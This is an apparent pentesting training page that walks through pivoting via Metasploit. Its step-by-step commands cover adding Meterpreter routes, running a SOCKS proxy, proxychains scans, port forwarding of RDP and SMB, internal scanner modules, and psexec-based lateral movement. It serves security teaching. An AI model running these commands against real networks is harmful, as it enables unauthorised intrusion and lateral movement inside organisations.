Home > Network Pentesting

Pivoting via Metasploit

Pivoting via Metasploit allows attackers to turn a compromised host into a routing point for deeper internal network access. Metasploit provides built-in modules for SOCKS proxies, port forwarding, and automatic network routing. Once a Meterpreter session is established, Metasploit can map the internal network, pivot into additional subnets, and run modules as if operating inside the LAN. This makes it a powerful framework for lateral movement.

Understanding How Metasploit Pivoting Works

Metasploit pivoting relies on three components:

  • A Meterpreter session on a compromised host

  • A route added to Metasploit’s routing table

  • A pivot method (SOCKS proxy or port forwarding)

After setup, internal hosts become reachable to Metasploit auxiliary modules and external tools via proxychains.

Step 1: Establish a Meterpreter Session

Initial foothold:

sessions -i

Ensure you have an active Meterpreter shell:

meterpreter >

This host becomes your pivot point into the internal network.

Step 2: Identify Internal Networks

Inside Meterpreter, check local networking.

Show IP Details

meterpreter > ipconfig

Check Routes

meterpreter > route

This reveals reachable subnets such as:

10.10.20.0/24
192.168.50.0/24

These subnets will be added to Metasploit routing.

Step 3: Add Internal Subnets as Pivot Routes

Inside Metasploit console:

route add <subnet> <mask> <session_id>

Example:

route add 10.10.20.0 255.255.255.0 3

This tells Metasploit to send traffic for that subnet through session 3.

View All Routes

route print

Once added, all framework modules will pivot automatically.

Step 4: Create a SOCKS Proxy for External Tools

Metasploit’s SOCKS proxy enables tools like Nmap, CrackMapExec, Impacket, and browser access through the pivot.

Start SOCKS Proxy Module

use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run

This launches a SOCKS5 proxy on port 1080.

Step 5: Configure Proxychains

Edit /etc/proxychains.conf:

socks5 127.0.0.1 1080

All external scanning and exploitation tools now route through the compromised host.

Step 6: Scan Internal Subnets via Proxychains

Nmap Scan Through Metasploit Pivot

proxychains nmap -sT 10.10.20.0/24

Access Internal Web Apps

proxychains firefox http://10.10.20.5

Metasploit now acts as a full internal gateway.

Step 7: Port Forwarding Through Meterpreter

For direct single-port access, use local port forwarding.

Forward Internal RDP to Local Machine

meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.20.10

Now connect locally:

rdesktop localhost:3389

Forward Internal SMB

meterpreter > portfwd add -l 4455 -p 445 -r 10.10.20.5

SMB becomes accessible:

smbclient //localhost/share

Port forwarding is ideal for GUI and legacy tools.

Step 8: Using Metasploit Modules Through the Pivot

Once routes exist, all modules automatically pivot.

Ping Sweep Internal Subnet

use auxiliary/scanner/discovery/icmp_sweep
set RHOSTS 10.10.20.0/24
run

Enumerate SMB Internally

use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 10.10.20.5
run

Identify Internal Services

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.20.0/24
set PORTS 1-1000
run

Metasploit treats the pivot as if it's directly inside the internal LAN.

Step 9: Pivoting Into Multiple Subnets

If the compromised host has access to more networks:

  1. Enumerate new subnets

  2. Add routes

  3. Rescan using SOCKS or Metasploit modules

Example:

route add 192.168.50.0 255.255.255.0 3

This enables multi-layer lateral movement.

Step 10: Privilege Escalation + Pivot Expansion

After mapping internal hosts, pivot into new systems using Metasploit modules like:

  • psexec

  • smb_login

  • ssh_login

  • winrm_login

Example:

use exploit/windows/smb/psexec
set RHOST 10.10.20.15
run

A new Meterpreter session can open deeper inside the network, creating more pivot points.

Why Metasploit Pivoting Matters

Metasploit simplifies pivoting by:

  • Automating route management

  • Creating SOCKS proxies for external tools

  • Supporting port forwarding

  • Integrating internal scanning modules

  • Enabling multi-hop lateral movement

With a single foothold, attackers can explore entire internal networks, exploit new hosts, and escalate privileges efficiently.

Intel Dump

  • Meterpreter sessions act as pivot points

  • route add enables internal routing for all Metasploit modules

  • SOCKS proxy (port 1080) allows external tools to pivot

  • portfwd enables direct RDP, SMB, SSH access

  • Metasploit auto-pivots once routes are added

  • Useful for scanning, exploitation, lateral movement inside networks

HOME COMMUNITY CAREERS DASHBOARD